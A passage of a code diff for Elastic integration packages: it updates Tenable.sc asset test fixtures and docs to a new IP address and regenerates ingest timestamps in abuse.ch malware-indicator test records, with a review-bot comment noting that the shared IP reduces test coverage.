}, "host": { @@ -21,7 +21,7 @@ "00-00-00-47-05-0D" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ], "domain": "example" }, @@ -38,7 +38,7 @@ "bios": { "guid": "9e8c4d43-982b-4405-a76c-d56c1d6cf117" }, - "ip": "0.0.228.153", + "ip": "89.160.20.156", "dns": { "name": "rnkmigauv2l8zeyf.example" }, 
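Review bot: All three fixture records now carry the same address `89.160.20.156`, while each record still declares `"hostUniqueness":"repositoryID,ip,dnsName"`; the input no longer exercises the ip component of that uniqueness key, and the only remaining per-record differences are uuid, macAddress, netbiosName and dnsName. Since the expected output copies this value into `host.ip`, `related.ip` and the asset `ip` field, a single shared value also means a mapping mix-up between records in the pipeline would go unnoticed by the test. If the test GeoIP database offers more than one supported address, giving each record a distinct one from that set (the one in the previous changelog entry "Change test public IPs to the supported subset") would restore that coverage without reintroducing unsupported public IPs. The same applies to the corresponding expected-output hunks below.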
@@ -66,7 +66,7 @@ } }, "event": { - "original": "{\"ip\":\"0.0.228.153\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:47:05:0d\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", + "original": "{\"ip\":\"89.160.20.156\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:47:05:0d\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", "type": "info", "category": "host", "kind": "state" @@ -86,7 +86,7 @@ "UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE" ], "ip": [ - "0.1.103.207" + "89.160.20.156" ] }, "host": { 
@@ -96,7 +96,7 @@ "00-00-00-7D-34-48" ], "ip": [ - "0.1.103.207" + "89.160.20.156" ], "domain": "example.com" }, @@ -113,7 +113,7 @@ "bios": { "guid": "8e0ab068-b851-4d1a-8a90-33afb6c5abb8" }, - "ip": "0.1.103.207", + "ip": "89.160.20.156", "dns": { "name": "zder1ktdpso1p0ro.example.com" }, 
@@ -141,7 +141,7 @@ } }, "event": { - "original": "{\"ip\":\"0.1.103.207\",\"uuid\":\"f89a0aa7-5f35-4f05-9462-09c2b73b70ba\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:7d:34:48\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\ZDER1KTDPSO1P0RO.EXAMPLE\",\"dnsName\":\"zder1ktdpso1p0ro.example.com\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8e0ab068-b851-4d1a-8a90-33afb6c5abb8\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", + "original": "{\"ip\":\"89.160.20.156\",\"uuid\":\"f89a0aa7-5f35-4f05-9462-09c2b73b70ba\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:7d:34:48\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\ZDER1KTDPSO1P0RO.EXAMPLE\",\"dnsName\":\"zder1ktdpso1p0ro.example.com\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8e0ab068-b851-4d1a-8a90-33afb6c5abb8\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", "type": "info", "category": "host", "kind": "state" @@ -161,7 +161,7 @@ "UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE" ], "ip": [ - "0.1.119.220" + "89.160.20.156" ] }, "host": { 
@@ -171,7 +171,7 @@ "00-00-00-2B-1D-2E" ], "ip": [ - "0.1.119.220" + "89.160.20.156" ], "domain": "example.co.in" }, @@ -188,7 +188,7 @@ "bios": { "guid": "8b8a7f3e-d8d2-4728-a661-08dff6da5f1a" }, - "ip": "0.1.119.220", + "ip": "89.160.20.156", "dns": { "name": "g2ounzt879fe2djt.example.co.in" }, 
@@ -216,7 +216,7 @@ } }, "event": { - "original": "{\"ip\":\"0.1.119.220\",\"uuid\":\"7113d6ed-f91a-4fe2-bb8b-e653d2570507\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:2b:1d:2e\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\G2OUNZT879FE2DJT.EXAMPLE\",\"dnsName\":\"g2ounzt879fe2djt.example.co.in\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", + "original": "{\"ip\":\"89.160.20.156\",\"uuid\":\"7113d6ed-f91a-4fe2-bb8b-e653d2570507\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:2b:1d:2e\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\G2OUNZT879FE2DJT.EXAMPLE\",\"dnsName\":\"g2ounzt879fe2djt.example.co.in\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", "type": "info", "category": "host", "kind": "state" diff --git a/packages/tenable_sc/data_stream/asset/sample_event.json b/packages/tenable_sc/data_stream/asset/sample_event.json index dbcd0c16a18..12d6fd36da2 100644 
--- a/packages/tenable_sc/data_stream/asset/sample_event.json +++ b/packages/tenable_sc/data_stream/asset/sample_event.json 
@@ -28,14 +28,14 @@ "dataset": "tenable_sc.asset", "ingested": "2021-12-09T09:09:52Z", "kind": "state", - "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"0.0.228.153\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", + "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"89.160.20.156\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", "type": "info" }, "host": { "domain": "example", "hostname": "rnkmigauv2l8zeyf.example", "ip": [ - "0.0.228.153" + "89.160.20.156" ], "mac": [ "00-00-00-47-05-0D" 
@@ -52,7 +52,7 @@ "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ] }, "tags": [ @@ -69,7 +69,7 @@ "name": "rnkmigauv2l8zeyf.example" }, "host_uniqueness": "repositoryID,ip,dnsName", - "ip": "0.0.228.153", + "ip": "89.160.20.156", "mac": "00-00-00-47-05-0D", "netbios": { "name": "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" diff --git a/packages/tenable_sc/docs/README.md b/packages/tenable_sc/docs/README.md index a4b9af55558..724254dacfe 100644 --- a/packages/tenable_sc/docs/README.md +++ b/packages/tenable_sc/docs/README.md 
@@ -59,14 +59,14 @@ An example event for `asset` looks as following: "dataset": "tenable_sc.asset", "ingested": "2021-12-09T09:09:52Z", "kind": "state", - "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"0.0.228.153\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", + "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"89.160.20.156\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", "type": "info" }, "host": { "domain": "example", "hostname": "rnkmigauv2l8zeyf.example", "ip": [ - "0.0.228.153" + "89.160.20.156" ], "mac": [ 
"00-00-00-47-05-0D" @@ -83,7 +83,7 @@ An example event for `asset` looks as following: "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ] }, "tags": [ @@ -100,7 +100,7 @@ An example event for `asset` looks as following: "name": "rnkmigauv2l8zeyf.example" }, "host_uniqueness": "repositoryID,ip,dnsName", - "ip": "0.0.228.153", + "ip": "89.160.20.156", "mac": "00-00-00-47-05-0D", "netbios": { "name": "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" diff --git a/packages/ti_abusech/changelog.yml b/packages/ti_abusech/changelog.yml index be88686cfcb..677dd7a9220 100644 --- a/packages/ti_abusech/changelog.yml +++ b/packages/ti_abusech/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.4" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.3" changes: - description: Change test public IPs to the supported subset diff --git a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json index c389ac03ae4..7989d7039ed 100644 --- a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json 
@@ -36,7 +36,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807747500Z", + "ingested": "2021-12-14T14:56:11.724485962Z", "original": "{\"md5_hash\":\"7871286a8f1f68a14b18ae475683f724\",\"sha256_hash\":\"48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:14:05\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW\",\"tlsh\":\"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -82,7 +82,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807764300Z", + "ingested": "2021-12-14T14:56:11.724488224Z", "original": "{\"md5_hash\":\"7b4c77dc293347b467fb860e34515163\",\"sha256_hash\":\"ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -134,7 +134,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807776600Z", + "ingested": "2021-12-14T14:56:11.724488673Z", "original": "{\"md5_hash\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"sha256_hash\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:22\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/\",\"virustotal\":{\"result\":\"25 / 66\",\"percent\":\"37.88\",\"link\":\"https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd\",\"tlsh\":\"7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -180,7 +180,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807787900Z", + "ingested": "2021-12-14T14:56:11.724489057Z", "original": "{\"md5_hash\":\"e2e02aae857488dbdbe6631c29abf3f8\",\"sha256_hash\":\"7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:21\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH\",\"tlsh\":\"5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", 
@@ -223,7 +223,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807799200Z", + "ingested": "2021-12-14T14:56:11.724489464Z", "original": "{\"md5_hash\":\"3e988e32b0c3c230d534e286665b89a5\",\"sha256_hash\":\"760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b\",\"file_type\":\"unknown\",\"file_size\":\"352\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/\",\"virustotal\":null,\"imphash\":null,\"ssdeep\":\"6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR\",\"tlsh\":\"3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190\"}", "category": "threat", "type": "indicator", @@ -275,7 +275,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807810400Z", + "ingested": "2021-12-14T14:56:11.724489873Z", "original": "{\"md5_hash\":\"dcc20d534cdf29eab03d8148bf728857\",\"sha256_hash\":\"86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/\",\"virustotal\":{\"result\":\"27 / 69\",\"percent\":\"39.13\",\"link\":\"https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH\",\"tlsh\":\"0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -321,7 +321,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807886200Z", + "ingested": "2021-12-14T14:56:11.724490274Z", "original": "{\"md5_hash\":\"f6facbf7a90b9e67a6de9f6634eb40ba\",\"sha256_hash\":\"e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:53\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL\",\"tlsh\":\"2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -367,7 +367,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807898100Z", + "ingested": "2021-12-14T14:56:11.724490660Z", "original": "{\"md5_hash\":\"44325fd5bdda2e2cdea07c3a39953bb1\",\"sha256_hash\":\"beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg\",\"tlsh\":\"A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -415,7 +415,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807909300Z", + "ingested": "2021-12-14T14:56:11.724491052Z", "original": "{\"md5_hash\":\"4c549051950522a3f1b0814aa9b1f6d1\",\"sha256_hash\":\"7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:07:31\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv\",\"tlsh\":\"4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -461,7 +461,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807920500Z", + "ingested": "2021-12-14T14:56:11.724491438Z", "original": "{\"md5_hash\":\"d7333113098d88b6a5dd5b8eb24f9b87\",\"sha256_hash\":\"426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW\",\"tlsh\":\"9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", 
@@ -507,7 +507,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807931800Z", + "ingested": "2021-12-14T14:56:11.724491832Z", "original": "{\"md5_hash\":\"c8dbb261c1f450534c3693da2f4b479f\",\"sha256_hash\":\"25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR\",\"tlsh\":\"F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -553,7 +553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807943800Z", + "ingested": "2021-12-14T14:56:11.724492355Z", "original": "{\"md5_hash\":\"714953f1d0031a4bb2f0c44afd015931\",\"sha256_hash\":\"b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:06\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7\",\"tlsh\":\"F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -599,7 +599,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807955400Z", + "ingested": "2021-12-14T14:56:11.724492754Z", "original": "{\"md5_hash\":\"20fd22742500d4cec123398afc3d3672\",\"sha256_hash\":\"e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:00\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP\",\"tlsh\":\"BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -645,7 +645,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808039Z", + "ingested": 